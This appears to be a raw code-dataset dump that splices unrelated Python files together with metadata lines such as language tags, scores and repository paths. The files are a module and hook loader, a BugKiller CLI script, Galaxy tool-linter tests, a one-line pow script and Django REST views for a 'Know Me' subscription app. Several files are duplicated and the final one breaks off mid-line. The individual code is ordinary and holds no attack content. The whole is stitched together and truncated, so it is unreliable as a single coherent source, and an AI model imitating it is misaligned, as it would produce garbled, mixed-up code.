List[HookItemDict], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook] = [] for hook_item in hook_items: hook = ShellScriptHook( path_to_script=hook_item["path_to_script"], priority=hook_item["priority"], name=hook_item["name"], ) hooks.append(hook) return hooks @staticmethod def _validate_hooks( hooks: List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook], ) -> None: for index, _hook in enumerate(hooks, start=1): hook_name = _hook.hook_name if hook_name in [LinkDeploymentHook.NAME, LinkCleanUpHook.NAME]: raise ParserError( f"Cannot use reserved hook name '{hook_name}' in section " f"'hooks' at index {index}!" ) @staticmethod def _create_default_link_hooks( links: List[LinkItem], ) -> List[ShellScriptHook | LinkDeploymentHook | LinkCleanUpHook]: return [ LinkDeploymentHook(links=links), LinkCleanUpHook(links=links), ] @property def status(self) -> ModuleStatus: if self.errors: return ModuleStatus.ERROR if not self.enabled: return ModuleStatus.DISABLED path_manager = PathManager(root_path=self.root) if all( [ link.check_if_link_exists(path_manager=path_manager) and link.check_if_target_matched(path_manager=path_manager) for link in self.links ] ): return ModuleStatus.DEPLOYED return ModuleStatus.PENDING @property def errors(self) -> List[str]: path_manager = PathManager(root_path=self.root) errors = [] for link in self.links: errors += link.report_errors(path_manager=path_manager) for hook in self.hooks: errors += hook.report_errors(path_manager=path_manager) return errors @dataclass class HookAggregate: module: Module hook: Hook class Modules: """ Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. """ def __init__(self) -> None: self.modules: List[Module] = [] def __len__(self) -> int: return len(self.modules) @staticmethod def _config_file_paths( modules_root_path: Path, config_file_name: str ) -> Generator[Path, None, None]: return Path(modules_root_path).rglob(config_file_name) @classmethod def load(cls, modules_root_path: Path, config_file_name: str) -> "Modules": modules = cls() config_file_paths = cls._config_file_paths( modules_root_path=modules_root_path, config_file_name=config_file_name ) for config_file_path in config_file_paths: try: module = Module.from_path(path=config_file_path) except ModuleError as e: raise ModuleError( f"Error while loading module at path '{config_file_path}': {e}" ) from e modules.modules.append(module) # Sorting the modules in alphabetical path order. modules.modules.sort(key=lambda m: str(m.root)) return modules @property def variables(self) -> Dict[str, List[str]]: vars = {} for module in self.modules: if not module.enabled: continue for name, values in module.variables.items(): if name not in vars: vars[name] = list(values) else: for value in values: if value not in vars[name]: vars[name] += values vars[name].sort() return vars @property def hooks(self) -> OrderedDict[str, List[HookAggregate]]: hooks: OrderedDict[str, List[HookAggregate]] = OrderedDict() for module in self.modules: if not module.enabled: continue for hook in module.hooks: hook_name = hook.hook_name if hook_name not in hooks: hooks[hook_name] = [] hooks[hook_name].append(HookAggregate(module=module, hook=hook)) for _, values in hooks.items(): values.sort(key=lambda item: item.hook.hook_priority) return hooks
en
0.831445
Exception that will be raised on module level errors. Aggregation class that contains the loaded modules. It provides an interface to load the modules, and to collect the aggregated variables and hooks from them. # Sorting the modules in alphabetical path order.
2.033155
2
backend/app/cli.py
SeanFitzpatrick0/BugKiller
0
6629004
from typing import NoReturn from bug_killer_client_2.cli.builder import generate_cli from bug_killer_client_2.cli.builder import get_cli_defaults from bug_killer_client_2.cli.executor import execute_operation from bug_killer_client_2.service import project, bug from bug_killer_utils.object import get_local_function_in_module def main() -> NoReturn: defaults = get_cli_defaults() operations = get_local_function_in_module(project) + get_local_function_in_module(bug) parser = generate_cli(operations, defaults, 'BugKiller CLI') execute_operation(operations, parser.parse_args()) if __name__ == '__main__': main()
from typing import NoReturn from bug_killer_client_2.cli.builder import generate_cli from bug_killer_client_2.cli.builder import get_cli_defaults from bug_killer_client_2.cli.executor import execute_operation from bug_killer_client_2.service import project, bug from bug_killer_utils.object import get_local_function_in_module def main() -> NoReturn: defaults = get_cli_defaults() operations = get_local_function_in_module(project) + get_local_function_in_module(bug) parser = generate_cli(operations, defaults, 'BugKiller CLI') execute_operation(operations, parser.parse_args()) if __name__ == '__main__': main()
none
1
2.036013
2
test/unit/tool_util/test_tool_linters.py
brinkmanlab/galaxy
0
6629005
import pytest from galaxy.tool_util.lint import LintContext from galaxy.tool_util.linters import inputs from galaxy.util import etree NO_SECTIONS_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> """ NO_WHEN_IN_CONDITIONAL_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> """ RADIO_SELECT_INCOMPATIBILITIES = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> """ SELECT_DUPLICATED_OPTIONS = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool> """ TESTS = [ (NO_SECTIONS_XML, inputs.lint_inputs, lambda x: 'Found no input parameters.' in x.warn_messages), (NO_WHEN_IN_CONDITIONAL_XML, inputs.lint_inputs, lambda x: "Conditional [labels] no <when /> block found for select option 'none'" in x.warn_messages), (RADIO_SELECT_INCOMPATIBILITIES, inputs.lint_inputs, lambda x: 'Select [radio_select] display="radio" is incompatible with optional="true"' in x.error_messages and 'Select [radio_select] display="radio" is incompatible with multiple="true"' in x.error_messages), (SELECT_DUPLICATED_OPTIONS, inputs.lint_inputs, lambda x: 'Select [select] has multiple options with the same text content' in x.error_messages and 'Select [select] has multiple options with the same value' in x.error_messages), ] @pytest.mark.parametrize('tool_xml,lint_func,assert_func', TESTS, ids=['Lint no sections', 'lint no when', 'radio select incompatibilities', 'select duplicated options']) def test_tool_xml(tool_xml, lint_func, assert_func): lint_ctx = LintContext('all') tree = etree.ElementTree(element=etree.fromstring(tool_xml)) lint_ctx.lint(name="test_lint", lint_func=lint_func, lint_target=tree) assert assert_func(lint_ctx), f"Warnings: {lint_ctx.warn_messages}\nErrors: {lint_ctx.error_messages}"
import pytest from galaxy.tool_util.lint import LintContext from galaxy.tool_util.linters import inputs from galaxy.util import etree NO_SECTIONS_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> """ NO_WHEN_IN_CONDITIONAL_XML = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> """ RADIO_SELECT_INCOMPATIBILITIES = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> """ SELECT_DUPLICATED_OPTIONS = """ <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool> """ TESTS = [ (NO_SECTIONS_XML, inputs.lint_inputs, lambda x: 'Found no input parameters.' in x.warn_messages), (NO_WHEN_IN_CONDITIONAL_XML, inputs.lint_inputs, lambda x: "Conditional [labels] no <when /> block found for select option 'none'" in x.warn_messages), (RADIO_SELECT_INCOMPATIBILITIES, inputs.lint_inputs, lambda x: 'Select [radio_select] display="radio" is incompatible with optional="true"' in x.error_messages and 'Select [radio_select] display="radio" is incompatible with multiple="true"' in x.error_messages), (SELECT_DUPLICATED_OPTIONS, inputs.lint_inputs, lambda x: 'Select [select] has multiple options with the same text content' in x.error_messages and 'Select [select] has multiple options with the same value' in x.error_messages), ] @pytest.mark.parametrize('tool_xml,lint_func,assert_func', TESTS, ids=['Lint no sections', 'lint no when', 'radio select incompatibilities', 'select duplicated options']) def test_tool_xml(tool_xml, lint_func, assert_func): lint_ctx = LintContext('all') tree = etree.ElementTree(element=etree.fromstring(tool_xml)) lint_ctx.lint(name="test_lint", lint_func=lint_func, lint_target=tree) assert assert_func(lint_ctx), f"Warnings: {lint_ctx.warn_messages}\nErrors: {lint_ctx.error_messages}"
en
0.149762
<tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <conditional name="labels"> <param name="label_select" type="select" label="Points to label"> <option value="none" selected="True">None</option> </param> </conditional> </inputs> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="radio_select" type="select" display="radio" optional="true" multiple="true"/> </inputs> </tool> <tool name="BWA Mapper" id="bwa" version="1.0.1" is_multi_byte="true" display_interface="true" require_login="true" hidden="true"> <description>The BWA Mapper</description> <version_command interpreter="python">bwa.py --version</version_command> <inputs> <param name="select" type="select" optional="true" multiple="true"> <option value="v">x</option> <option value="v">x</option> </param> </inputs> </tool>
2.008105
2
main/find-pow-a-b-mod-m/find-pow-a-b-mod-m.py
EliahKagan/old-practice-snapshot
0
6629006
<gh_stars>0 for t in xrange(int(raw_input())): a, b, m = map(int, raw_input().split()) print pow(a, b, m)
for t in xrange(int(raw_input())): a, b, m = map(int, raw_input().split()) print pow(a, b, m)
none
1
2.845691
3
src/pylibgen/__init__.py
ABHISHEKVALSAN/python-package-creator
0
6629007
<reponame>ABHISHEKVALSAN/python-package-creator __version__=1.0 #There is no plan for Version Control System, #All the changes will be pushed to version 1.0
__version__=1.0 #There is no plan for Version Control System, #All the changes will be pushed to version 1.0
en
0.796709
#There is no plan for Version Control System, #All the changes will be pushed to version 1.0
1.19271
1
km_api/know_me/views.py
knowmetools/km-api
4
6629008
<reponame>knowmetools/km-api<gh_stars>1-10 """Views for the ``know_me`` module. """ import logging from django.conf import settings from django.db.models import Case, PositiveSmallIntegerField, Q, Value, When from django.http import HttpResponse, HttpRequest from django.shortcuts import get_object_or_404 from dry_rest_permissions.generics import DRYGlobalPermissions, DRYPermissions from rest_framework import generics, pagination, status from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from know_me import models, permissions, serializers from know_me.serializers import ( subscription_serializers, email_reminder_subscriber_serializers, ) from permission_utils.view_mixins import DocumentActionMixin logger = logging.getLogger(__name__) class AppleReceiptQueryView(generics.CreateAPIView): """ post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. """ serializer_class = subscription_serializers.AppleReceiptQuerySerializer def create(self, *args, **kwargs): """ Override the response returned from the parent class' ``create`` method to have a 200 status code. """ response = super().create(*args, **kwargs) response.status_code = status.HTTP_200_OK return response class AppleSubscriptionView(generics.RetrieveDestroyAPIView): """ delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. """ permission_classes = (DRYPermissions,) serializer_class = subscription_serializers.AppleReceiptSerializer def get_object(self): """ Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. """ return get_object_or_404( models.AppleReceipt, subscription__user=self.request.user ) def perform_destroy(self, instance): """ Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. """ subscription = instance.subscription subscription.is_active = False subscription.save() instance.delete() logger.info( "Deleted Apple receipt associated with subscription %d", subscription.pk, ) def put(self, request, *args, **kwargs): # If the user has an existing Apple subscription, update it try: instance = models.AppleReceipt.objects.get( subscription__user=self.request.user ) except models.AppleReceipt.DoesNotExist: instance = None # Validate the data provided to the serializer before we create # the base subscription (if necessary). serializer = self.get_serializer(instance, data=request.data) serializer.is_valid(raise_exception=True) subscription, _ = models.Subscription.objects.get_or_create( user=self.request.user, defaults={"is_active": False} ) serializer.save(subscription=subscription) return Response(serializer.data) class AccessorAcceptView(generics.GenericAPIView): """ post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. """ # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. permission_classes = (DRYGlobalPermissions,) queryset = models.KMUserAccessor.objects.all() # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. serializer_class = serializers.KMUserAccessorAcceptSerializer def check_object_permissions(self, request, obj): """ Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. """ super().check_object_permissions(request, obj) if not obj.has_object_accept_permission(request): self.permission_denied(request) def post(self, request, *args, **kwargs): accessor = self.get_object() accessor.is_accepted = True accessor.save() return Response(status=status.HTTP_204_NO_CONTENT) class AcceptedAccessorListView(generics.ListAPIView): """ get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. """ return self.request.user.km_user_accessors.filter(is_accepted=True) class AccessorDetailView( DocumentActionMixin, generics.RetrieveUpdateDestroyAPIView ): """ get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. """ query = Q(km_user__user=self.request.user) query |= Q(user_with_access=self.request.user) return models.KMUserAccessor.objects.filter(query) class AccessorListView(generics.ListCreateAPIView): """ get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* """ permission_classes = (DRYPermissions, permissions.HasPremium) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return km_user.km_user_accessors.all() def perform_create(self, serializer): """ Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return serializer.save(km_user=km_user) class ConfigDetailView(generics.RetrieveUpdateAPIView): """ get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. """ permission_classes = (DRYGlobalPermissions,) serializer_class = serializers.ConfigSerializer def get_object(self): """ Return the config instance singleton. """ config = models.Config.get_solo() self.check_object_permissions(self.request, config) return config class KMUserDetailView(generics.RetrieveUpdateAPIView): """ get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. """ permission_classes = (DRYPermissions,) queryset = models.KMUser.objects.all() serializer_class = serializers.KMUserDetailSerializer class KMUserListView(generics.ListAPIView): """ get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserListSerializer def get_queryset(self): """ Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. """ # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. filter_args = Q(km_user_accessor__is_accepted=True) filter_args &= Q(km_user_accessor__user_with_access=self.request.user) # If the premium requirement is enabled, the shared user must # have an active premium subscription. if settings.KNOW_ME_PREMIUM_ENABLED: filter_args &= Q( km_user_accessor__km_user__user__know_me_subscription__is_active=True # noqa ) # Requesting user is the user filter_args |= Q(user=self.request.user) query = models.KMUser.objects.filter(filter_args).distinct() # Allow us to sort the query with the requesting user's Know Me # user first. See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ query = query.annotate( owned_by_user=Case( When(user=self.request.user, then=Value(1)), default=Value(0), output_field=PositiveSmallIntegerField(), ) ) return query.order_by("-owned_by_user", "created_at") class LegacyUserDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. """ permission_classes = (DRYGlobalPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class LegacyUserListView(generics.ListCreateAPIView): """ get: Get a list of all legacy users. post: Add a new legacy user. """ pagination_class = pagination.PageNumberPagination permission_classes = (DRYPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class PendingAccessorListView(generics.ListAPIView): """ Endpoint for listing the accessors that the current user can accept. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. """ return self.request.user.km_user_accessors.filter(is_accepted=False) class ReminderEmailSubscriberDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. """ permission_classes = (DRYPermissions,) queryset = models.ReminderEmailSubscriber.objects.all() serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_object(self): """ Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404( models.ReminderEmailSubscriber, user=self.request.user ) class ReminderEmailSubscriberListView(generics.ListCreateAPIView): """ Endpoint for listing reminder email subscribers """ permission_classes = (DRYPermissions,) serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_queryset(self): """ Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. """ return models.ReminderEmailSubscriber.objects.filter( user=self.request.user ) def perform_create(self, serializer): """ Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``ReminderEmailSubscriber`` instance. """ return serializer.save(user=self.request.user) class ReminderEmailUnsubscribeView(HttpRequest): """ Endpoint for unsubscribing to email reminders through email link. """ def unsubscribe(request, *args, **kwargs): uuid = kwargs["subscription_uuid"] email = kwargs["email"] msg = "<h1>Invalid Link</h1>" sub = models.ReminderEmailSubscriber.objects.filter( subscription_uuid=uuid ).first() if ( sub is not None and str(sub.user.primary_email).lower() == email.lower() ): sub.delete() msg = "<h1>Unsubscribed</h1>" return HttpResponse(msg, content_type="text/html", charset="utf-8") class SubscriptionDetailView(generics.RetrieveAPIView): """ get: Get an overview of the requesting user's Know Me premium subscription. """ permission_classes = (IsAuthenticated,) serializer_class = subscription_serializers.SubscriptionSerializer def get_object(self): """ Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404(models.Subscription, user=self.request.user) class SubscriptionTransferView(generics.CreateAPIView): """ post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription. """ permission_classes = (permissions.HasPremium,) serializer_class = subscription_serializers.SubscriptionTransferSerializer
"""Views for the ``know_me`` module. """ import logging from django.conf import settings from django.db.models import Case, PositiveSmallIntegerField, Q, Value, When from django.http import HttpResponse, HttpRequest from django.shortcuts import get_object_or_404 from dry_rest_permissions.generics import DRYGlobalPermissions, DRYPermissions from rest_framework import generics, pagination, status from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from know_me import models, permissions, serializers from know_me.serializers import ( subscription_serializers, email_reminder_subscriber_serializers, ) from permission_utils.view_mixins import DocumentActionMixin logger = logging.getLogger(__name__) class AppleReceiptQueryView(generics.CreateAPIView): """ post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. """ serializer_class = subscription_serializers.AppleReceiptQuerySerializer def create(self, *args, **kwargs): """ Override the response returned from the parent class' ``create`` method to have a 200 status code. """ response = super().create(*args, **kwargs) response.status_code = status.HTTP_200_OK return response class AppleSubscriptionView(generics.RetrieveDestroyAPIView): """ delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. """ permission_classes = (DRYPermissions,) serializer_class = subscription_serializers.AppleReceiptSerializer def get_object(self): """ Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. """ return get_object_or_404( models.AppleReceipt, subscription__user=self.request.user ) def perform_destroy(self, instance): """ Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. """ subscription = instance.subscription subscription.is_active = False subscription.save() instance.delete() logger.info( "Deleted Apple receipt associated with subscription %d", subscription.pk, ) def put(self, request, *args, **kwargs): # If the user has an existing Apple subscription, update it try: instance = models.AppleReceipt.objects.get( subscription__user=self.request.user ) except models.AppleReceipt.DoesNotExist: instance = None # Validate the data provided to the serializer before we create # the base subscription (if necessary). serializer = self.get_serializer(instance, data=request.data) serializer.is_valid(raise_exception=True) subscription, _ = models.Subscription.objects.get_or_create( user=self.request.user, defaults={"is_active": False} ) serializer.save(subscription=subscription) return Response(serializer.data) class AccessorAcceptView(generics.GenericAPIView): """ post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. """ # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. permission_classes = (DRYGlobalPermissions,) queryset = models.KMUserAccessor.objects.all() # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. serializer_class = serializers.KMUserAccessorAcceptSerializer def check_object_permissions(self, request, obj): """ Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. """ super().check_object_permissions(request, obj) if not obj.has_object_accept_permission(request): self.permission_denied(request) def post(self, request, *args, **kwargs): accessor = self.get_object() accessor.is_accepted = True accessor.save() return Response(status=status.HTTP_204_NO_CONTENT) class AcceptedAccessorListView(generics.ListAPIView): """ get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. """ return self.request.user.km_user_accessors.filter(is_accepted=True) class AccessorDetailView( DocumentActionMixin, generics.RetrieveUpdateDestroyAPIView ): """ get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. """ query = Q(km_user__user=self.request.user) query |= Q(user_with_access=self.request.user) return models.KMUserAccessor.objects.filter(query) class AccessorListView(generics.ListCreateAPIView): """ get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* """ permission_classes = (DRYPermissions, permissions.HasPremium) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return km_user.km_user_accessors.all() def perform_create(self, serializer): """ Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. """ km_user = get_object_or_404(models.KMUser, user=self.request.user) return serializer.save(km_user=km_user) class ConfigDetailView(generics.RetrieveUpdateAPIView): """ get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. """ permission_classes = (DRYGlobalPermissions,) serializer_class = serializers.ConfigSerializer def get_object(self): """ Return the config instance singleton. """ config = models.Config.get_solo() self.check_object_permissions(self.request, config) return config class KMUserDetailView(generics.RetrieveUpdateAPIView): """ get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. """ permission_classes = (DRYPermissions,) queryset = models.KMUser.objects.all() serializer_class = serializers.KMUserDetailSerializer class KMUserListView(generics.ListAPIView): """ get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserListSerializer def get_queryset(self): """ Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. """ # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. filter_args = Q(km_user_accessor__is_accepted=True) filter_args &= Q(km_user_accessor__user_with_access=self.request.user) # If the premium requirement is enabled, the shared user must # have an active premium subscription. if settings.KNOW_ME_PREMIUM_ENABLED: filter_args &= Q( km_user_accessor__km_user__user__know_me_subscription__is_active=True # noqa ) # Requesting user is the user filter_args |= Q(user=self.request.user) query = models.KMUser.objects.filter(filter_args).distinct() # Allow us to sort the query with the requesting user's Know Me # user first. See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ query = query.annotate( owned_by_user=Case( When(user=self.request.user, then=Value(1)), default=Value(0), output_field=PositiveSmallIntegerField(), ) ) return query.order_by("-owned_by_user", "created_at") class LegacyUserDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. """ permission_classes = (DRYGlobalPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class LegacyUserListView(generics.ListCreateAPIView): """ get: Get a list of all legacy users. post: Add a new legacy user. """ pagination_class = pagination.PageNumberPagination permission_classes = (DRYPermissions,) queryset = models.LegacyUser.objects.all() serializer_class = serializers.LegacyUserSerializer class PendingAccessorListView(generics.ListAPIView): """ Endpoint for listing the accessors that the current user can accept. """ permission_classes = (DRYPermissions,) serializer_class = serializers.KMUserAccessorSerializer def get_queryset(self): """ Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. """ return self.request.user.km_user_accessors.filter(is_accepted=False) class ReminderEmailSubscriberDetailView(generics.RetrieveUpdateDestroyAPIView): """ delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. """ permission_classes = (DRYPermissions,) queryset = models.ReminderEmailSubscriber.objects.all() serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_object(self): """ Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404( models.ReminderEmailSubscriber, user=self.request.user ) class ReminderEmailSubscriberListView(generics.ListCreateAPIView): """ Endpoint for listing reminder email subscribers """ permission_classes = (DRYPermissions,) serializer_class = ( email_reminder_subscriber_serializers.ReminderEmailSubscriberSerializer ) def get_queryset(self): """ Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. """ return models.ReminderEmailSubscriber.objects.filter( user=self.request.user ) def perform_create(self, serializer): """ Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``ReminderEmailSubscriber`` instance. """ return serializer.save(user=self.request.user) class ReminderEmailUnsubscribeView(HttpRequest): """ Endpoint for unsubscribing to email reminders through email link. """ def unsubscribe(request, *args, **kwargs): uuid = kwargs["subscription_uuid"] email = kwargs["email"] msg = "<h1>Invalid Link</h1>" sub = models.ReminderEmailSubscriber.objects.filter( subscription_uuid=uuid ).first() if 